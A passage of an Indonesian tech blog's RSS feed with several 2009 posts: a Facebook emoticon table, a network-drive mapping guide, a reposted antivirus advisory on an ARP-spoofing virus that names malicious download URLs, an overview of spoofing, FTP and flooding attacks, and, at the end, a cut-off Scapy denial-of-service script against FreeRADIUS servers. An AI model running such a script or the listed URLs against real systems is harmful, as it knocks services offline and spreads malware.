emoticon adalah sebuah icon berupa gambar still atau gerak yang menggambarkan suasana hati. Emoticon juga kadang disebut smiley, emote, dan lain-lain. Contoh yang paling sering digunakan yaitu smiley/emoticon yang dipake saat chatting pakai messenger seperti Yahoo!Messenger, MSN, dll.
Emoticon juga ada pada fitur chat yang ada pada facebook. Apabila [...]]]></description>
			<content:encoded><![CDATA[<p>Sering make facebook buat chat sama temen?<br />
Tau emoticon?</p>
<p>emoticon adalah sebuah icon berupa gambar still atau gerak yang menggambarkan suasana hati. Emoticon juga kadang disebut smiley, emote, dan lain-lain. Contoh yang paling sering digunakan yaitu smiley/emoticon yang dipake saat chatting pakai messenger seperti Yahoo!Messenger, MSN, dll.</p>
<p>Emoticon juga ada pada fitur chat yang ada pada facebook. Apabila kita mengetikkan suatu teks tertentu, maka emoticon yang sesuai akan muncul.</p>
<p>Nah, bingung kan teks apa yang harus ditulis supaya emoticonnya keluar. Cukup ketikkan salah satu teks dibawah gambar yang ingin ditampilkan.</p>
<p>Berikut daftar emoticon chat facebook :</p>

<table id="wp-table-reloaded-id-1-no-1" class="wp-table-reloaded wp-table-reloaded-id-1">
<thead>
	<tr class="row-1 odd">
		<th class="column-1">Image</th><th class="column-2">Coding</th><th class="column-3">Image</th><th class="column-4">Coding</th>
	</tr>
</thead>
<tbody>
	<tr class="row-2 even">
		<td class="column-1"><img src="http://calebbrown.id.au/images/fb_emotes/fb_tounge.png" alt="" /></td><td class="column-2">:-P :P :-p :p =P</td><td class="column-3"><img src="http://calebbrown.id.au/images/fb_emotes/fb_smile.png" alt="" /></td><td class="column-4">:-) :) :] =)</td>
	</tr>
	<tr class="row-3 odd">
		<td class="column-1"><img src="http://calebbrown.id.au/images/fb_emotes/fb_grin.png" alt="" /></td><td class="column-2">:-D :D =D</td><td class="column-3"><img src="http://calebbrown.id.au/images/fb_emotes/fb_frown.png" alt="" /></td><td class="column-4">:-( :( :[ =(</td>
	</tr>
	<tr class="row-4 even">
		<td class="column-1"><img src="http://calebbrown.id.au/images/fb_emotes/fb_gasp.png" alt="" /></td><td class="column-2">:-O :O :-o :o</td><td class="column-3"><img src="http://calebbrown.id.au/images/fb_emotes/fb_devil.png" alt="" /></td><td class="column-4">3:) 3:-)</td>
	</tr>
	<tr class="row-5 odd">
		<td class="column-1"><img src="http://calebbrown.id.au/images/fb_emotes/fb_wink.png" alt="" /></td><td class="column-2">;-) ;)</td><td class="column-3"><img src="http://calebbrown.id.au/images/fb_emotes/fb_angel.png" alt="" /></td><td class="column-4">O:) O:-)</td>
	</tr>
	<tr class="row-6 even">
		<td class="column-1"><img src="http://calebbrown.id.au/images/fb_emotes/fb_glasses.png" alt="" /></td><td class="column-2">8-) 8) B-) B)</td><td class="column-3"><img src="http://calebbrown.id.au/images/fb_emotes/fb_kiss.png" alt="" /></td><td class="column-4">:-* :*</td>
	</tr>
	<tr class="row-7 odd">
		<td class="column-1"><img src="http://calebbrown.id.au/images/fb_emotes/fb_sunglasses.png" alt="" /></td><td class="column-2">8-| 8| B-| B|</td><td class="column-3"><img src="http://calebbrown.id.au/images/fb_emotes/fb_heart.png" alt="" /></td><td class="column-4"><3</td>
	</tr>
	<tr class="row-8 even">
		<td class="column-1"><img src="http://calebbrown.id.au/images/fb_emotes/fb_grumpy.png" alt="" /></td><td class="column-2">>:( >:-(</td><td class="column-3"><img src="http://calebbrown.id.au/images/fb_emotes/fb_kiki.png" alt="" /></td><td class="column-4">^_^</td>
	</tr>
	<tr class="row-9 odd">
		<td class="column-1"><img src="http://calebbrown.id.au/images/fb_emotes/fb_unsure.png" alt="" /></td><td class="column-2">:/ :-/ :\ :-\</td><td class="column-3"><img src="http://calebbrown.id.au/images/fb_emotes/fb_squint.png" alt="" /></td><td class="column-4">-_-</td>
	</tr>
	<tr class="row-10 even">
		<td class="column-1"><img src="http://calebbrown.id.au/images/fb_emotes/fb_upset.png" alt="" /></td><td class="column-2">>:O >:-O >:o >:-o</td><td class="column-3"><img src="http://calebbrown.id.au/images/fb_emotes/fb_pacman.png" alt="" /></td><td class="column-4">:v</td>
	</tr>
	<tr class="row-11 odd">
		<td class="column-1"><img src="http://calebbrown.id.au/images/fb_emotes/fb_curlylips.png" alt="" /></td><td class="column-2">:3</td><td class="column-3"><img src="http://static.ak.fbcdn.net/images/emote/robot.gif" alt="" /></td><td class="column-4">:|]</td>
	</tr>
	<tr class="row-12 even">
		<td class="column-1"><img src="http://static.ak.fbcdn.net/images/emote/putnam.gif" alt="" /></td><td class="column-2">:putnam:</td><td class="column-3"><img title="shark" src="http://static.ak.fbcdn.net/images/emote/shark.gif" alt="shark" width="16" height="16" /></td><td class="column-4">(^^^)</td>
	</tr>
	<tr class="row-13 odd">
		<td class="column-1"><img src="http://calebbrown.id.au/images/fb_emotes/fb_cry.png" alt="" /></td><td class="column-2">:'(</td><td class="column-3"><img src="http://calebbrown.id.au/images/fb_emotes/fb_confused.png" alt="" /></td><td class="column-4">o.O O.o</td>
	</tr>
</tbody>
</table>

<p>salam hangat<br />
banksonk</p>
]]></content:encoded>
			<wfw:commentRss>http://www.kukukakikukakukaku.com/136.sonk/feed</wfw:commentRss>
		<slash:comments>13</slash:comments>
		</item>
		<item>
		<title>Mapping Network Drive</title>
		<link>http://www.kukukakikukakukaku.com/mapping-network-drive.sonk</link>
		<comments>http://www.kukukakikukakukaku.com/mapping-network-drive.sonk#comments</comments>
		<pubDate>Thu, 03 Dec 2009 07:37:03 +0000</pubDate>
		<dc:creator>bento</dc:creator>
				<category><![CDATA[Network]]></category>
		<category><![CDATA[Server]]></category>
		<category><![CDATA[Windows]]></category>
		<category><![CDATA[drive]]></category>
		<category><![CDATA[map]]></category>
		<category><![CDATA[mapping]]></category>
		<category><![CDATA[share]]></category>

		<guid isPermaLink="false">http://www.kukukakikukakukaku.com/?p=128</guid>
		<description><![CDATA[HiHiHiHiHiHi&#8230;.awal mula ada temen tanya kalo sharing data bisa ga tanpa harus buka My Network Places?? dan jawabannya adalah bisa..
berikut caranya :
1. Pada explorer klik submenu tools » map network drive

2. nah kemudian akan muncul jendela map network drive kemudian disana isikan sebagai berikut :
Drive » ini nantinya menentukan folder sharing diganti menjadi virtual drive [...]]]></description>
			<content:encoded><![CDATA[<p>HiHiHiHiHiHi&#8230;.awal mula ada temen tanya kalo sharing data bisa ga tanpa harus buka My Network Places?? dan jawabannya adalah bisa..<br />
berikut caranya :<br />
1. Pada explorer klik submenu tools » map network drive<br />
<img src="http://photo.lareosing.org/image.php?id=757F_4B13F38D" alt="1" /></p>
<p>2. nah kemudian akan muncul jendela map network drive kemudian disana isikan sebagai berikut :</p>
<p>Drive » ini nantinya menentukan folder sharing diganti menjadi virtual drive (a,c,d,e&#8230;z)<br />
Folder » ini adalah source/asal dari folder yang di share pada komputer lain, untuk itu cukup isi dengan \\<ip address>\<nama folder yang di share></p>
<p>contoh : \\172.10.10.14\film</p>
<p><img src="http://photo.lareosing.org/image.php?id=1C7E_4B13F38D" alt="2" /></p>
<p>3. setelah itu klik finish</p>
<p>maka akan muncul virtual directory secara otomatis pada explorer, dan itulah folder share dari komputer lain tadi.</p>
<p>nb : agar virtual drive bisa diakses disarankan PC yang share data harus dalam keadaan hidup.</p>
<p>salam hangat<br />
banksonk</p>
]]></content:encoded>
			<wfw:commentRss>http://www.kukukakikukakukaku.com/mapping-network-drive.sonk/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Virus ARP Spoofing&#8230;</title>
		<link>http://www.kukukakikukakukaku.com/virus-arp-spoofing.sonk</link>
		<comments>http://www.kukukakikukakukaku.com/virus-arp-spoofing.sonk#comments</comments>
		<pubDate>Wed, 18 Nov 2009 19:57:32 +0000</pubDate>
		<dc:creator>bento</dc:creator>
				<category><![CDATA[Linux]]></category>
		<category><![CDATA[Network]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Server]]></category>
		<category><![CDATA[Windows]]></category>
		<category><![CDATA[arp]]></category>
		<category><![CDATA[client]]></category>
		<category><![CDATA[dhcp]]></category>
		<category><![CDATA[gateway]]></category>
		<category><![CDATA[ip address]]></category>
		<category><![CDATA[jaringan]]></category>
		<category><![CDATA[mac address]]></category>
		<category><![CDATA[proxy]]></category>
		<category><![CDATA[router]]></category>
		<category><![CDATA[snooping]]></category>
		<category><![CDATA[spoofing]]></category>
		<category><![CDATA[switch]]></category>
		<category><![CDATA[virus]]></category>
		<category><![CDATA[W32/Agent.FUVR]]></category>

		<guid isPermaLink="false">http://www.kukukakikukakukaku.com/?p=103</guid>
		<description><![CDATA[Otak intelektual dibalik misteri kesaktian virus Microsoft.pif.
Mengapa penyakit Demam Berdarah sangat ditakuti dan setiap tahun selalu memakan korban jiwa ? Sebenarnya jika penderita Demam Berdarah dapat mendeteksi bahwa dia di serang oleh kuman dengue, kemungkinan yang fatal akan jauh lebih kecil dan dapat di hindari. Tetapi yang menjadi masalah adalah gejala-gejala awal DB ini pada [...]]]></description>
			<content:encoded><![CDATA[<p>Otak intelektual dibalik misteri kesaktian virus Microsoft.pif.</p>
<p>Mengapa penyakit Demam Berdarah sangat ditakuti dan setiap tahun selalu memakan korban jiwa ? Sebenarnya jika penderita Demam Berdarah dapat mendeteksi bahwa dia di serang oleh kuman dengue, kemungkinan yang fatal akan jauh lebih kecil dan dapat di hindari. Tetapi yang menjadi masalah adalah gejala-gejala awal DB ini pada awalnya sulit dibedakan dari demam biasa dan hanya dapat dipastikan dengan pemeriksaan darah di laboratorium beberapa hari sesudah demam.<br />
Hal yang serupa saat ini sedang terjadi di jaringan intranet Indonesia. Saat ini, ada satu virus impor dari Cina yang memiliki kemampuan memalsukan MAC Address router / proxy sehingga seluruh komputer intranet yang terhubung ke internet melalui proxy akan dikelabui untuk melewati komputer yang terinfeksi virus dan celakanya komputer yang terinfeksi virus ini akan meneruskan akses router ini (transparent proxy) sambil &#8220;menitipkan&#8221; satu link download yang berisi virus. Praktis pengakses internet dalam jaringan akan mendapatkan kiriman virus setiap kali membuka browser. Karena yang &#8220;dikerjai&#8221; adalah router, maka link berisi virus ini tidak akan pandang bulu dikirimkan ke seluruh komputer dalam jaringan, tidak perduli apa merek browser yang dipakai, baik IE, Firefox atau Safari sekalipun tetap mendapatkan kiriman virus. Menurut pengetesan Vaksincom, selain Windows XP yang menjadi sasaran tembak virus, ternyata OS Windows Vista dan Linux sekalipun akan tetap mendapatkan kiriman virus ini setiap kali melakukan browsing. Hanya saja virus yang dikirim saat ini bisa berjalan di platform Windows XP. Tetapi setidaknya hal ini menunjukkan proof of concept bahwa secara teknis platform apapun dapat dicapai oleh virus.<br />
Kembali ke analogi Demam Berdarah di atas, menurut pengamatan Vaksincom korban virus ini cukup banyak, khususnya menyerang jaringan intranet yang tidak terlindung oleh antivirus dengan &#8220;sempurna&#8221;**. Dan kebanyakan korbannya tidak menyadari. Biasanya korban mulai menyadari kalau masalahnya sudah cukup besar seperti tahu-tahu jaringannya jadi lambat dan setiap kali menyalakan komputer dimana komputer akan otomatis mengaktifkan Yahoo Messenger, MSN Messenger atau aplikasi apapun yang mengaktifkan Javascript browser maka akan mendapatkan pesan error.</p>
<p>**<br />
Yang dimaksudkan dengan perlindungan antivirus yang sempurna adalah SEMUA komputer dalam jaringan (khususnya Windows XP) sudah terlindung dengan antivirus yang terupdate. Disini dikatakan semua karena virus ini hanya membutuhkan satu saja komputer di dalam jaringan intranet terinfeksi virus ini dan dalam waktu singkat ia akan mengambil alih Gateway internet dan menyebarkan dirinya ke seluruh komputer dalam jaringan intranet (dengan catatan jaringan / switch belum dilengkapi dengan perlindungan anti ARP Spoofing atau lebih dikenal dengan nama DHCP Snooping).</p>
<p>Gejala jaringan terinfeksi virus<br />
Jika koneksi internet di kantor anda tahu-tahu mengalami kelambatan yang signifikan padahal koneksi internet dari ISP tidak ada masalah di tambah komputer dalam jaringan &#8220;berulang-ulang&#8221; mendapatkan insiden virus atau ketika menjalankan Yahoo Messenger anda mendapatkan pesan &#8220;An error has occured in the script on this page&#8221;. Jika anda menggunakan Norman Virus Control setiap kali menjalankan Yahoo Messenger / MSN Messenger atau menjalankan browser terdeteksi virus dengan nama W32/Agent.FUVR. Atau di sistem Windows anda ada file dengan nama Microsoft.vbs, Microsoft.bat atau Microsoft.pif maka kemungkinan besar komputer anda / jaringan ada yang terinfeksi virus Agent.FUVR. Lihat artikel virus ini di situs vaksin.com.<br />
Aksi virus ini pada beberapa OS adalah sebagai berikut :<br />
• Windows XP tanpa antivirus / antivirus tidak terupdate.<br />
Tidak ada gejala apa-apa dan dapat langsung terinfeksi, sekaligus PC yang terinfeksi akan menjadi host virus di dalam jaringan yang kemudian akan memalsukan MAC Address Gateway.<br />
• Windows XP dengan antivirus terupdate dan mampu mendeteksi virus ini.<br />
&#8220;Setiap kali&#8221; menjalankan aplikasi yang mengakses fitur browser seperti menjalankan Internet Explorer, Firefox, login Yahoo Messenger, login MSN Messenger akan mendapatkan pesan bahwa ada virus terdeteksi di sistem Windows.<br />
• Windows Vista<br />
&#8220;Setiap kali&#8221; menjalankan aplikasi yang mengakses fitur browser seperti menjalankan Internet Explorer, Firefox, login Yahoo Messenger, login MSN Messenger akan mendapatkan pesan download error script dari site :<br />
• http://root.51113.com/root.gif<br />
• http://hk.www404.cn:53/ads.js<br />
• http://err.www404.cn:443/014.html</p>
<p>Catatan : Website di atas hanya beberapa yang teridentifikasi oleh Vaksincom dan tidak tertutup kemungkinan untuk berubah / bertambah.<br />
Tampilan website terinfeksi virus sulit dibedakan<br />
Anda tidak akan dapat membedakan tampilan website yang yang sudah di injeksi oleh script yang mengirimkan virus ini karena pada banyak kasus tampilannya sama saja dengan website tidak asli.<br />
Baru jika anda melakukan View Source dengan mengklik [View] [Page Source] atau Ctrl U dari Firefox (dari IE anda dapat melakukan View Source dengan cara klik [View] [Source]). Baru akan terlihat bahwa di awal website ternyata ada javascript yang mengarahkan download script dengan nama &#8220;ads.js&#8221; (lihat gambar 2) yang akan langsung terinstal secara otomatis setiap kali anda mengaktifkan browser atau menjalankan Yahoo Messenger (karena Yahoo Messenger mengaktifkan browser).<br />
Antivirus saja tidak cukup !!<br />
Sebenarnya hampir semua antivirus sudah dapat mendeteksi virus ini. Ada yang mendeteksi sebagai W32/Agent.FUVR (Norman), Trojan Downloader, Trojan-Downloader.JS.Agent.byh (Kaspersky), HEUR/Exploit.HTML (Avira), Mal/ObfJS-X (Sophos), JS_PSYME.CPZ (Trend Micro). Jadi secara teori, virus ini tidak dapat menginfeksi komputer yang terlindung antivirus yang terupdate. Tetapi masalahnya adalah dalam kenyataannya di lapangan sangat sulit &#8220;menjamin&#8221; seluruh komputer di jaringan terlindung dengan antivirus yang terupdate, apalagi jika ada komputer / notebook dari luar jaringan yang dihubungkan ke jaringan intranet, cukup satu saja komputer yang terinfeksi maka dalam waktu singkat ia akan memalsukan diri sebagai router / geteway dan menyebarkan dirinya ke seluruh komputer lain dalam intranet yang mengakses internet.<br />
Selain itu, virus ini memiliki kemampuan mengupdate dirinya sehingga deteksi antivirus akan menjadi percuma jika pembuatnya meluncurkan varian baru dan dijamin langsung akan menaklukkan semua antivirus sampai vendor antivirus mendapatkan samplenya dan mendeteksi virus tersebut dengan update terbaru.</p>
<p>Masalah mendasar adalah sebenarnya patching. Selama celah kemanan tidak ditutup, maka sekalipun ada antivirus yang melindungi komputer, virus ini tetap akan mampu wara-wiri di dalam jaringan sampai celah keamanan di tutup. Yang menjadi pertanyaan adalah bagaimana menutup celah keamanan yang disebabkan oleh hardware yang mengandung kelemahan ARP Spoofing ini ? Salah satu caranya adalah mengganti switch dengan yang mendukung DHCP Snoop. Sebenarnya ada cara lain yang cukup hemat biaya yaitu dengan menggunakan perintah &#8220;arp -s&#8221; dari DOS Prompt guna mengunci IP dan Mac Address gateway di tiap PC, tetapi kalau PCnya ribuan dan tersebar di banyak lokasi rasanya solusi ini cukup membawa sengsara bagi administrator. Belum lagi kalau terjadi perubahan IP / Mac Address gateway, jadi perintah &#8220;arp -s&#8221; tersebut harus dilakukan di setiap PC lagi.</p>
<p>Bagaimana cara mengatasinya ?<br />
Jika anda terinfeksi oleh virus ini dan pusing karena setiap kali dibersihkan kok virusnya kembali lagi. Percayalah, bukan anda saja yang pusing dan para administrator lain juga pusing. Langkah pertama yang harus anda lakukan setiap kali menghadapi masalah yang memusingkan adalah &#8230; NGELAMUN dulu. Mohon maaf, kami tidak bermaksud membuat anda di pecat, tetapi jika anda langsung sibuk membersihkan virus di setiap komputer dan belum mendapatkan gambaran masalah sebenarnya dimana, maka yang akan anda alami adalah virusnya kembali lagi dan memboroskan waktu anda. Dengan melamun anda jadi dapat melakukan analisa dengan tenang dan kepala dingin mengumpulkan data kira-kira apa sih yang terjadi. Jika anda pelanggan korporat Vaksincom, biarkan teknisi kami yang melamun dan memecahkan masalah anda &#8230;. GRATIS.<br />
Kami juga mengalami hal yang serupa dan setelah &#8220;melamun&#8221; dua hari baru berhasil mengidentifikasi masalah dengan cukup jelas dimana virus ini mengeksploitasi ARP vulnerability dengan memalsukan Mac Address Gateway / Router. Jadi langkah pertama adalah menemukan gateway palsu tersebut. Bagaimana caranya ?<br />
Anda dapat menggunakan tools gratisan Colasoft Mac Scanner http://www.colasoft.com/mac_scanner/mac_scanner.php dan jalankan di komputer yang terhubung ke jaringan intranet anda. Lalu lihat IP yang memiliki Mac Address yang sama dengan Gateway / proxy (lihat gambar 4)<br />
Dalam gambar 4 di atas, Gateway adalah IP 192.168.1.1 dengan MAC Address 00:01:6C:CD:D5:24. Terlihat bahwa IP 192.168.1.106 memiliki MAC Address yang sama dengan Gateway. Jadi langkah pertama yang harus anda lakukan adalah memutuskan hubungan 192.168.1.106 dari jaringan dan membersihkan dari virus ini.<br />
Langkah pamungkas<br />
Sebagai langkah pamungkas, anda dapat mencegah komputer-komputer di jaringan untuk dibodohi oleh ARP Spoofing ini. Gunakan perintah &#8220;arp -s [IP Gateway / Proxy] [MAC Address Gateway / Proxy]&#8221; untuk menetapkan static IP dan MAC Address Gateway / Proxy di setiap komputer.<br />
Jika anda memiliki banyak komputer dalam jaringan, kami sarankan untuk mempertimbangkan menggunakan switch yang mensupport DHCP Snoop. Jangan langsung beli dulu, cek dulu apakah switch yang anda miliki memiliki fitur ini. Kalau ada, langsung aktifkan dan set paremeter dengan baik guna terhindar dari ARP Spoofing.</p>
<p>Jika anda tertarik untuk mengetahui lebih jauh tentang ARP Spoofing, ancaman-ancamannya dan bagaimana cara menghadapinya. Nantikan seminar yang akan diadakan oleh PT. Vaksincom pada tanggal 10 Juli 2008 hasil kerjasama antara Trisakti School of Management, Cisco Indonesia dan Vaksincom. Seminar ini akan dibawakan oleh Alberto Rivai &#8211; Security Engineer Cisco Indonesia, Alfons Tanujaya &#8211; Antivirus Specialist, Dani Firmansyah &#8211; ARP Spoofing Expert.</p>
<p>source : http://vaksin.com</p>
]]></content:encoded>
			<wfw:commentRss>http://www.kukukakikukakukaku.com/virus-arp-spoofing.sonk/feed</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>cracker attack&#8230;</title>
		<link>http://www.kukukakikukakukaku.com/cracker-attack.sonk</link>
		<comments>http://www.kukukakikukakukaku.com/cracker-attack.sonk#comments</comments>
		<pubDate>Tue, 10 Nov 2009 18:23:48 +0000</pubDate>
		<dc:creator>bento</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[Network]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[broadcasting]]></category>
		<category><![CDATA[exploits]]></category>
		<category><![CDATA[flooding]]></category>
		<category><![CDATA[ftp attack]]></category>
		<category><![CDATA[ip spoofing]]></category>
		<category><![CDATA[unix]]></category>

		<guid isPermaLink="false">http://www.kukukakikukakukaku.com/?p=94</guid>
		<description><![CDATA[1. IP Spoofing
IP Spoofing juga dikenal sebagai Source Address Spoofing, yaitu pemalsuan alamat IP attacker sehingga sasaran menganggap alamat IP attacker adalah alamat IP dari host di dalam network bukan dari luar network. Misalkan attacker mempunyai IP address type A 66.25.xx.xx ketika attacker melakukan serangan jenis ini maka Network yang diserang akan menganggap IP attacker [...]]]></description>
			<content:encoded><![CDATA[<p>1. IP Spoofing</p>
<p style="text-align: justify;">IP Spoofing juga dikenal sebagai Source Address Spoofing, yaitu pemalsuan alamat IP attacker sehingga sasaran menganggap alamat IP attacker adalah alamat IP dari host di dalam network bukan dari luar network. Misalkan attacker mempunyai IP address type A 66.25.xx.xx ketika attacker melakukan serangan jenis ini maka Network yang diserang akan menganggap IP attacker adalah bagian dari Networknya misal 192.xx.xx.xx yaitu IP type C. IP Spoofing terjadi ketika seorang attacker ‘mengakali’ packet routing untuk mengubah arah dari data atau transmisi ke tujuan yang berbeda. Packet untuk routing biasanya di transmisikan secara transparan dan jelas sehingga membuat attacker dengan mudah untuk memodifikasi asal data ataupun tujuan dari data. Teknik ini bukan hanya dipakai oleh attacker tetapi juga dipakai oleh para security profesional untuk men tracing identitas dari para attacker. protokol yang menangani komunikasi antar komputer kebanyakan berhasil di spoof. ICMP (Internet Control Message Protocol) adalah salah satunya(vulnerable) karena protokol ini dilewati oleh informasi dan pesan-pesan kesalahan diantara dua node dalam network. Internet Group Message Protocol(IGMP) dapat dieksploitasi dengan menggunakan serangan tipe ini karena IGMP melaporkan kondisi kesalahan pada level user datagram, selain itu juga protokol ini mengandung Informasi routing dan Informasi Network. (UDP) User Datagram Protocol juga dapat ‘diminta’ untuk menampilkan identitas host sasaran. Solusi untuk mencegah IP spoofing adalah dengan cara mengamankan packet-packet yang ditransmisikan dan memasang screening policies. Enkripsi Point-to-point juga dapat mencegah user yang tidak mempunyai hak untuk membaca data/packet. Autentikasi dapat juga digunakan untuk menyaring source yang legal dan bukan source yang sudah di spoof oleh attacker. Dalam pencegahan yang lain, Admininistrator dapat menggunakan signature untuk paket-paket yang berkomunikasi dalam networknya sehingga meyakinkan bahwa paket tersebut tidak diubah dalam perjalanan. Anti Spoofing rules(peraturan anti spoof) yang pada dasarnya memberitahukan server untuk menolak packet yang datangnya dari luar yang terlihat datangnya dari dalam, umumnya hal ini akan mematahkan setiap serangan spoofing.</p>
<p>2. FTP Attack</p>
<p style="text-align: justify;">Salah satu serangan yang dilakukan terhadap File Transfer Protocol adalah serangan buffer overflow yang diakibatkan oleh malformed command. tujuan menyerang FTP server ini rata-rata adalah untuk mendapatkan command shell ataupun untuk melakukan Denial Of Service. Serangan Denial Of Service akhirnya dapat menyebabkan seorang user atau attacker untuk mengambil resource didalam network tanpa adanya autorisasi, sedangkan command shell dapat membuat seorang attacker mendapatkan akses ke sistem server dan file-file data yang akhirnya seorang attacker bisa membuat anonymous root-acces yang mempunyai hak penuh terhadap system bahkan network yang diserang.<br />
Tidak pernah atau jarang mengupdate versi server dan mempatchnya adalah kesalahan yang sering dilakukan oleh seorang admin dan inilah yang membuat server FTP menjadi rawan untuk dimasuki. Sebagai contoh adalah FTP server yang populer di keluarga UNIX yaitu WU-FTPD yang selalu di upgrade dua kali dalam sehari untuk memperbaiki kondisi yang mengizinkan terjadinya bufferoverflow Mengexploitasi FTP juga berguna untuk mengetahui password yang terdapat dalam sistem, FTP Bounce attack(menggunakan server ftp orang lain untuk melakukan serangan), dan mengetahui atau mensniff informasi yang berada dalam sistem.
<p>3. Unix Finger Exploits</p>
<p style="text-align: justify;">Pada masa awal internet, Unix OS finger utility digunakan secara efficient untuk men sharing informasi diantara pengguna. Karena permintaan informasi terhadap informasi finger ini tidak menyalahkan peraturan, kebanyakan system Administrator meninggalkan utility ini (finger) dengan keamanan yang sangat minim, bahkan tanpa kemanan sama sekali. Bagi seorang attacker utility ini sangat berharga untuk melakukan informasi tentang footprinting, termasuk nama login dan informasi contact. Utility ini juga menyediakan keterangan yang sangat baik tentang aktivitas user didalam sistem, berapa lama user berada dalam sistem dan seberapa jauh user merawat sistem. Informasi yang dihasilkan dari finger ini dapat meminimalisasi usaha cracker dalam menembus sebuah sistem. Keterangan pribadi tentang user yang dimunculkan oleh finger daemon ini sudah cukup bagi seorang atacker untuk melakukan social engineering dengan menggunakan social skillnya untuk memanfaatkan user agar ‘memberitahu’ password dan kode akses terhadap system.
<p>4. Flooding &amp; Broadcasting</p>
<p style="text-align: justify;">Seorang attacker bisa menguarangi kecepatan network dan host-host yang berada di dalamnya secara significant dengan cara terus melakukan request/permintaan terhadap suatu informasi dari sever yang bisa menangani serangan classic Denial Of Service(Dos), mengirim request ke satu port secara berlebihan dinamakan flooding, kadang hal ini juga disebut spraying. Ketika permintaan flood ini dikirim ke semua station yang berada dalam network serangan ini dinamakn broadcasting. Tujuan dari kedua serangan ini adalah sama yaitu membuat network resource yang menyediakan informasi menjadi lemah dan akhirnya menyerah.<br />
Serangan dengan cara Flooding bergantung kepada dua faktor yaitu: ukuran dan/atau volume (size and/or volume). Seorang attacker dapat menyebabkan Denial Of Service dengan cara melempar file berkapasitas besar atau volume yang besar dari paket yang kecil kepada sebuah system. Dalam keadaan seperti itu network server akan menghadapi kemacetan: terlalu banyak informasi yang diminta dan tidak cukup power untuk mendorong data agar berjalan. Pada dasarnya paket yang besar membutuhkan kapasitas proses yang besar pula, tetapi secara tidak normal paket yang kecil dan sama dalam volume yang besar akan menghabiskan resource secara percuma, dan mengakibatkan kemacetan. Attacker sering kali menggunakan serangan flooding ini untuk mendapatkan akses ke system yang digunakan untuk menyerang network lainnya dalam satu serangan yang dinamakan Distributed Denial Of Service(DDOS). Serangan ini seringkali dipanggil smurf jika dikirim melaluli ICMP dan disebut fraggles ketika serangan ini dijalakan melewati UDP.<br />
Suatu node (dijadikan tools) yang menguatkan broadcast traffic sering disebut sebagai Smurf Amplifiers, tools ini sangat efektif untuk menjalankan serangan flooding. Dengan melakukan spoofing terhadap network sasaran, seorang attacker dapat mengirim sebuah request ke smurf amplifier, Network yang di amplifiying(dikuatkan) akan mengirim respon kesetiap host di dalam network itu sendiri, yang berarti satu request yang dilakukan oleh attacker akan menghasilkan pekerjaan yang sama dan berulang-ulang pada network sasaran, hasil dari serangan ini adalah sebuah denial of service yang tidak meninggalkan jejak. Serangan ini dapat diantisipasi dengan cara menolak broadcast yang diarahkan pada router. TCP-level Flooding (kebanyakan SYN ATTACK) telah digunakan pada bulan februari tahun 2000 untuk menyerang Yahoo!, eBay dll yang menggunakan serangan DDOS(Distributed Denial Of Service). Network yang tidak menggunakan firewall untuk pengecekan paket-paket TCP biasanya bisa diserang dengan cara ini. Beberapa fungsi penyaringan pada firewall (Firewall Filtering Function) biasanya akan mampu untuk menahan satu serangan flooding dari sebuah alamat IP, tetapi serangan yang dilakukan melalui DDOS akan sulit di cegah karena serangan ini seperti kita ketahui datangnya dari berbagai alamat IP secara berkala. Sebenarnya salah satu cara untuk menghentikan serangan DDOS adalah dengan cara mengembalikan paket ke alamat asalnya atau juga dengan cara mematikan network(biasanya dilakukan oleh system yang sudah terkena serangan sangat parah).<br />
]]></content:encoded>
			<wfw:commentRss>http://www.kukukakikukakukaku.com/cracker-attack.sonk/feed</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Freeradius Packet of Death</title>
		<link>http://www.kukukakikukakukaku.com/freeradius-packet-of-death.sonk</link>
		<comments>http://www.kukukakikukakukaku.com/freeradius-packet-of-death.sonk#comments</comments>
		<pubDate>Wed, 21 Oct 2009 02:59:50 +0000</pubDate>
		<dc:creator>bento</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Network]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[ddos]]></category>
		<category><![CDATA[radius]]></category>

		<guid isPermaLink="false">http://www.kukukakikukakukaku.com/?p=31</guid>
		<description><![CDATA[I haven’t had a chance to use Scapy in a little while, and I don’t spend hardly any time in Python (don’t really know the language at all, to be honest), but a long time ago I was searching for an IPv6 capable successor to Hping. Scapy almost fits the bill.
Earlier today, while reading through [...]]]></description>
			<content:encoded><![CDATA[<p>I haven’t had a chance to use <a href="http://www.secdev.org/projects/scapy/doc/index.html">Scapy </a>in a little while, and I don’t spend hardly any time in Python (don’t really know the language at all, to be honest), but a long time ago I was searching for an IPv6 capable successor to <a href="http://www.hping.org/">Hping</a>. Scapy almost fits the bill.</p>
<p>Earlier today, while reading through <a href="http://www.gossamer-threads.com/lists/fulldisc/">Full Disclosure</a>, I came across something interesting: a <a href="http://www.gossamer-threads.com/lists/fulldisc/full-disclosure/69935">Freeradius DoS bug</a>. This piqued my interest as I’m currently experiencing _something_ that’s periodically knocking over radiusd. Furthermore, the radius server in question talks to a router with problematic L2TP tunnels (caused by a software bugs in L2TP sequencing on the Telco router on the other end…their vendor has confirmed the problems)</p>
<p>Time to create the packet of death. Scapy doesn’t appear to have a layer for RadiusAttributes yet, thankfully it IS in their <a href="http://trac.secdev.org/scapy/attachment/ticket/92/radiuslib.py">Trac</a>.</p>
<p>So, download the layer to scapy/layers, ensure that it imports the required items:<br />
<code>    import struct<br />
    from scapy.packet import *<br />
    from scapy.fields import *<br />
    from scapy.layers.inet import UDP</p>
<p>    from scapy.layers.radius import Radius</code><br />
Add “radiuslib” to the load_layers array in config.py, and we’re ready to go:<br />
<code>    #!/usr/bin/env python<br />
    # FreeRadius Packet Of Death<br />
    # Matthew Gillespie 2009-09-11<br />
    import sys<br />
    from scapy.all import IP,UDP,send,Radius,RadiusAttr<br />
    if len(sys.argv) != 2:<br />
    print “Usage: radius_killer.py <radiushost>\n”<br />
    sys.exit(1)<br />
    PoD=IP(dst=sys.argv[1])/UDP(sport=60422,dport=1812)/ \<br />
    Radius(code=1,authenticator=”\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99″,id=180)/ \<br />
